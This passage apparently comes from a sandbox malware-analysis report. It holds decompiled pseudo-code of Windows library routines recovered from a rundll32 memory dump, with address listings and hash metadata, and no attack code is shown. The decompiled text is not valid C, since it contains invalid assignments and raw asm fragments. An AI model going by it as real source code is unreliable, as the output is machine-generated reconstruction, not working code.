				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x46cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E045F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E046A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04619E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0461B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0461CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E045F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E046A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0461AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x46c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x46c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x46c8628; // 0x0
							_t116 =  *0x46c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                            0x045fb94c
                                                                                            0x045fb956
                                                                                            0x045fb95c
                                                                                            0x045fb95e
                                                                                            0x045fb964
                                                                                            0x045fb969
                                                                                            0x045fb96d
                                                                                            0x045fb96d
                                                                                            0x045fb970
                                                                                            0x045fb974
                                                                                            0x045fb97a
                                                                                            0x045fbadf
                                                                                            0x045fbadf
                                                                                            0x045fbae2
                                                                                            0x045fbae4
                                                                                            0x045fbae6
                                                                                            0x045fbaf0
                                                                                            0x04642cb8
                                                                                            0x045fbaf6
                                                                                            0x045fbaf6
                                                                                            0x045fbaf6
                                                                                            0x045fbafd
                                                                                            0x045fbb1f
                                                                                            0x045fbb1f
                                                                                            0x045fbaff
                                                                                            0x045fbb00
                                                                                            0x045fbb00
                                                                                            0x045fbb03
                                                                                            0x045fbb03
                                                                                            0x045fbacb
                                                                                            0x045fbacf
                                                                                            0x045fbad0
                                                                                            0x045fbad1
                                                                                            0x045fbadc
                                                                                            0x045fbadc
                                                                                            0x045fb980
                                                                                            0x045fb980
                                                                                            0x045fb988
                                                                                            0x045fb98b
                                                                                            0x045fb98d
                                                                                            0x045fb990
                                                                                            0x045fb993
                                                                                            0x045fb999
                                                                                            0x045fb99b
                                                                                            0x045fb9a1
                                                                                            0x045fb9a5
                                                                                            0x045fb9aa
                                                                                            0x045fb9b0
                                                                                            0x045fb9bb
                                                                                            0x045fb9c0
                                                                                            0x045fb9c3
                                                                                            0x045fb9ca
                                                                                            0x045fb9cc
                                                                                            0x045fb9cf
                                                                                            0x045fb9d3
                                                                                            0x045fb9d7
                                                                                            0x045fba94
                                                                                            0x045fba94
                                                                                            0x045fba98
                                                                                            0x045fbaa3
                                                                                            0x04642ccb
                                                                                            0x045fbaa9
                                                                                            0x045fbaa9
                                                                                            0x045fbaa9
                                                                                            0x045fbab1
                                                                                            0x04642cd5
                                                                                            0x04642cdd
                                                                                            0x04642cdd
                                                                                            0x045fbabb
                                                                                            0x045fbabc
                                                                                            0x045fbac2
                                                                                            0x045fbac3
                                                                                            0x045fbac3
                                                                                            0x045fbac6
                                                                                            0x00000000
                                                                                            0x045fb9dd
                                                                                            0x045fb9dd
                                                                                            0x045fb9e7
                                                                                            0x045fb9e7
                                                                                            0x045fb9ec
                                                                                            0x045fb9ec
                                                                                            0x045fb9f1
                                                                                            0x045fb9f5
                                                                                            0x045fb9fa
                                                                                            0x045fba00
                                                                                            0x045fba0c
                                                                                            0x045fba10
                                                                                            0x045fba10
                                                                                            0x045fba12
                                                                                            0x045fba18
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045fbb26
                                                                                            0x045fbb26
                                                                                            0x045fba1e
                                                                                            0x045fba1e
                                                                                            0x045fba23
                                                                                            0x045fba25
                                                                                            0x045fba2c
                                                                                            0x045fba30
                                                                                            0x045fba35
                                                                                            0x045fba35
                                                                                            0x045fba41
                                                                                            0x045fba46
                                                                                            0x045fba4c
                                                                                            0x045fba50
                                                                                            0x045fba54
                                                                                            0x045fba6a
                                                                                            0x045fba6e
                                                                                            0x045fba70
                                                                                            0x045fba74
                                                                                            0x045fba78
                                                                                            0x045fba7a
                                                                                            0x045fba7c
                                                                                            0x045fba8e
                                                                                            0x045fba90
                                                                                            0x045fba92
                                                                                            0x045fbb14
                                                                                            0x045fbb14
                                                                                            0x045fbb16
                                                                                            0x045fbb16
                                                                                            0x00000000
                                                                                            0x045fba7c
                                                                                            0x045fbb0a
                                                                                            0x045fbb0d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045fbb0f

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045FB9A5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 885266447-0
                                                                                            • Opcode ID: 3fe397728bd8894f0ff31567d02785147eb7a937ce0c61d6f969677bfb621244
                                                                                            • Instruction ID: d88dbec4b2d0a014fdc19eea26745e8d32ef6dc6beb303efc8de68c58de89766
                                                                                            • Opcode Fuzzy Hash: 3fe397728bd8894f0ff31567d02785147eb7a937ce0c61d6f969677bfb621244
                                                                                            • Instruction Fuzzy Hash: 2B5157B1A08341CFC720DF29C88092ABBE5FB88654F14896EF6D587354E731F844DB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E045DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x46af7a8);
				E0462D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0462D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0461D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0461F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0462DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0461B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0461B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0461E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0461A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                            0x045db171
                                                                                            0x045db171
                                                                                            0x045db171
                                                                                            0x045db171
                                                                                            0x045db171
                                                                                            0x045db176
                                                                                            0x045db17b
                                                                                            0x045db180
                                                                                            0x045db186
                                                                                            0x045db18f
                                                                                            0x045db198
                                                                                            0x045db1a4
                                                                                            0x045db1aa
                                                                                            0x04634802
                                                                                            0x04634802
                                                                                            0x04634805
                                                                                            0x0463480c
                                                                                            0x0463480e
                                                                                            0x045db1d1
                                                                                            0x045db1d3
                                                                                            0x045db1de
                                                                                            0x045db1de
                                                                                            0x04634817
                                                                                            0x0463481e
                                                                                            0x04634820
                                                                                            0x04634822
                                                                                            0x04634822
                                                                                            0x04634824
                                                                                            0x04634824
                                                                                            0x0463482a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04634835
                                                                                            0x0463483a
                                                                                            0x0463483d
                                                                                            0x0463483f
                                                                                            0x04634842
                                                                                            0x04634842
                                                                                            0x04634842
                                                                                            0x04634846
                                                                                            0x0463484c
                                                                                            0x0463484e
                                                                                            0x04634851
                                                                                            0x04634851
                                                                                            0x04634853
                                                                                            0x04634854
                                                                                            0x04634854
                                                                                            0x04634858
                                                                                            0x0463485a
                                                                                            0x0463485a
                                                                                            0x0463485d
                                                                                            0x0463485f
                                                                                            0x04634861
                                                                                            0x04634861
                                                                                            0x04634866
                                                                                            0x0463486b
                                                                                            0x0463486e
                                                                                            0x04634871
                                                                                            0x04634876
                                                                                            0x04634876
                                                                                            0x04634878
                                                                                            0x0463487b
                                                                                            0x04634884
                                                                                            0x04634884
                                                                                            0x00000000
                                                                                            0x0463487d
                                                                                            0x0463487d
                                                                                            0x04634882
                                                                                            0x04634889
                                                                                            0x04634889
                                                                                            0x0463488f
                                                                                            0x04634891
                                                                                            0x046348e0
                                                                                            0x046348e2
                                                                                            0x046348e4
                                                                                            0x046348e4
                                                                                            0x046348e7
                                                                                            0x046348e7
                                                                                            0x046348ed
                                                                                            0x046348f4
                                                                                            0x046348f6
                                                                                            0x04634951
                                                                                            0x04634951
                                                                                            0x04634953
                                                                                            0x04634953
                                                                                            0x04634956
                                                                                            0x04634956
                                                                                            0x04634958
                                                                                            0x04634959
                                                                                            0x04634959
                                                                                            0x0463495d
                                                                                            0x0463495d
                                                                                            0x0463495f
                                                                                            0x0463495f
                                                                                            0x04634965
                                                                                            0x04634969
                                                                                            0x046349ba
                                                                                            0x046349ba
                                                                                            0x046349c1
                                                                                            0x046349c5
                                                                                            0x046349cc
                                                                                            0x046349d4
                                                                                            0x046349d7
                                                                                            0x046349da
                                                                                            0x046349e4
                                                                                            0x046349e5
                                                                                            0x046349f3
                                                                                            0x04634a02
                                                                                            0x00000000
                                                                                            0x04634a02
                                                                                            0x04634972
                                                                                            0x04634974
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04634976
                                                                                            0x04634979
                                                                                            0x04634982
                                                                                            0x04634983
                                                                                            0x04634984
                                                                                            0x0463498b
                                                                                            0x0463498d
                                                                                            0x04634991
                                                                                            0x04634993
                                                                                            0x04634999
                                                                                            0x0463499d
                                                                                            0x046349a2
                                                                                            0x046349a2
                                                                                            0x046349a2
                                                                                            0x04634999
                                                                                            0x046349ac
                                                                                            0x00000000
                                                                                            0x046349b3
                                                                                            0x046348f8
                                                                                            0x046348fe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046348fe
                                                                                            0x04634895
                                                                                            0x0463489c
                                                                                            0x046348ad
                                                                                            0x046348b2
                                                                                            0x046348b5
                                                                                            0x046348b7
                                                                                            0x046348ba
                                                                                            0x046348bc
                                                                                            0x046348c6
                                                                                            0x046348c6
                                                                                            0x046348cb
                                                                                            0x046348d1
                                                                                            0x046348d4
                                                                                            0x046348d8
                                                                                            0x046348d8
                                                                                            0x00000000
                                                                                            0x046348d8
                                                                                            0x046348be
                                                                                            0x046348c0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046348c2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046348c4
                                                                                            0x00000000
                                                                                            0x04634882
                                                                                            0x0463487b
                                                                                            0x04634904
                                                                                            0x04634906
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04634908
                                                                                            0x0463490e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04634910
                                                                                            0x04634917
                                                                                            0x04634917
                                                                                            0x00000000
                                                                                            0x04634917
                                                                                            0x045db1ba
                                                                                            0x046347f9
                                                                                            0x046347fc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x046347fc
                                                                                            0x045db1c0
                                                                                            0x045db1c0
                                                                                            0x045db1c3
                                                                                            0x045db1cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: _vswprintf_s
                                                                                            • String ID:
                                                                                            • API String ID: 677850445-0
                                                                                            • Opcode ID: fbcd2050e92de773afc38a7b32e6dae58200e570e981e5a6d6ce88039cb3fa54
                                                                                            • Instruction ID: 5c5d908daba5c72893a337a01b8875d4ec994c2bace1161e9982bab3429fac57
                                                                                            • Opcode Fuzzy Hash: fbcd2050e92de773afc38a7b32e6dae58200e570e981e5a6d6ce88039cb3fa54
                                                                                            • Instruction Fuzzy Hash: 5351D171D002998EEB31CF68C844BAEFBB1BF04715F1441ADD859AB391EB74A941DF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04602581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E04602581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t239;
				signed int _t243;
				void* _t244;
				void* _t246;
				signed int _t248;
				signed int _t249;
				void* _t251;
				signed int _t258;
				signed int _t260;
				intOrPtr _t262;
				signed int _t265;
				signed int _t272;
				signed int _t275;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t293;
				void* _t295;
				signed int _t296;
				unsigned int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t309;
				intOrPtr _t321;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t337;
				signed int _t338;
				void* _t340;
				signed int _t341;
				signed int _t343;
				signed int _t346;
				void* _t347;
				void* _t349;

				_t343 = _t346;
				_t347 = _t346 - 0x4c;
				_v8 =  *0x46cd360 ^ _t343;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t337 = 0x46cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t299 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t349 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t289 = 0x48;
				_t319 = 0 | _t349 == 0x00000000;
				_t330 = 0;
				_v37 = _t349 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t289 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t338 = 0xc0000106;
						goto L32;
					} else {
						_t337 = L045F4620(_t299,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t289);
						_v52 = _t337;
						__eflags = _t337;
						if(_t337 == 0) {
							_t338 = 0xc0000017;
							goto L32;
						} else {
							 *(_t337 + 0x44) =  *(_t337 + 0x44) & 0x00000000;
							_t50 = _t337 + 0x48; // 0x48
							_t332 = _t50;
							_t319 = _v32;
							 *((intOrPtr*)(_t337 + 0x3c)) = _t289;
							_t291 = 0;
							 *((short*)(_t337 + 0x30)) = _v48;
							__eflags = _t319;
							if(_t319 != 0) {
								 *(_t337 + 0x18) = _t332;
								__eflags = _t319 - 0x46c8478;
								 *_t337 = ((0 | _t319 == 0x046c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0461F3E0(_t332,  *((intOrPtr*)(_t319 + 4)),  *_t319 & 0x0000ffff);
								_t319 = _v32;
								_t347 = _t347 + 0xc;
								_t291 = 1;
								__eflags = _a8;
								_t332 = _t332 + (( *_t319 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t283 = E046639F2(_t332);
									_t319 = _v32;
									_t332 = _t283;
								}
							}
							_t303 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t338 = _v68;
								__eflags = 0;
								 *((short*)(_t332 - 2)) = 0;
								goto L32;
							} else {
								_t293 = _t337 + _t291 * 4;
								_v56 = _t293;
								do {
									__eflags = _t319;
									if(_t319 != 0) {
										_t239 =  *(_v60 + _t303 * 4);
										__eflags = _t239;
										if(_t239 == 0) {
											goto L30;
										} else {
											__eflags = _t239 == 5;
											if(_t239 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t293 =  *(_v60 + _t303 * 4);
										 *(_t293 + 0x18) = _t332;
										_t243 =  *(_v60 + _t303 * 4);
										__eflags = _t243 - 8;
										if(_t243 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t243 * 4 +  &M04602959))) {
												case 0:
													__ax =  *0x46c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0461F3E0(__edi,  *0x46c848c, __ax & 0x0000ffff);
														__eax =  *0x46c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0461F3E0(_t332, _v80, _v64);
													_t278 = _v64;
													goto L26;
												case 2:
													 *0x46c8480 & 0x0000ffff = E0461F3E0(__edi,  *0x46c8484,  *0x46c8480 & 0x0000ffff);
													__eax =  *0x46c8480 & 0x0000ffff;
													__eax = ( *0x46c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0461F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0461F3E0(_t332, _v76, _v36);
														_t278 = _v36;
													}
													L26:
													_t347 = _t347 + 0xc;
													_t332 = _t332 + (_t278 >> 1) * 2 + 2;
													__eflags = _t332;
													L27:
													_push(0x3b);
													_pop(_t280);
													 *((short*)(_t332 - 2)) = _t280;
													goto L28;
												case 6:
													__ebx =  *0x46c575c;
													__eflags = __ebx - 0x46c575c;
													if(__ebx != 0x46c575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0461F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x46c575c;
														} while (__ebx != 0x46c575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x46c8478 & 0x0000ffff = E0461F3E0(__edi,  *0x46c847c,  *0x46c8478 & 0x0000ffff);
													__eax =  *0x46c8478 & 0x0000ffff;
													__eax = ( *0x46c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E046639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x46c6e58 & 0x0000ffff = E0461F3E0(__edi,  *0x46c6e5c,  *0x46c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x46c6e58 & 0x0000ffff;
													__eax = ( *0x46c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t303 = _v16;
													_t319 = _v32;
													L29:
													_t293 = _t293 + 4;
													__eflags = _t293;
													_v56 = _t293;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
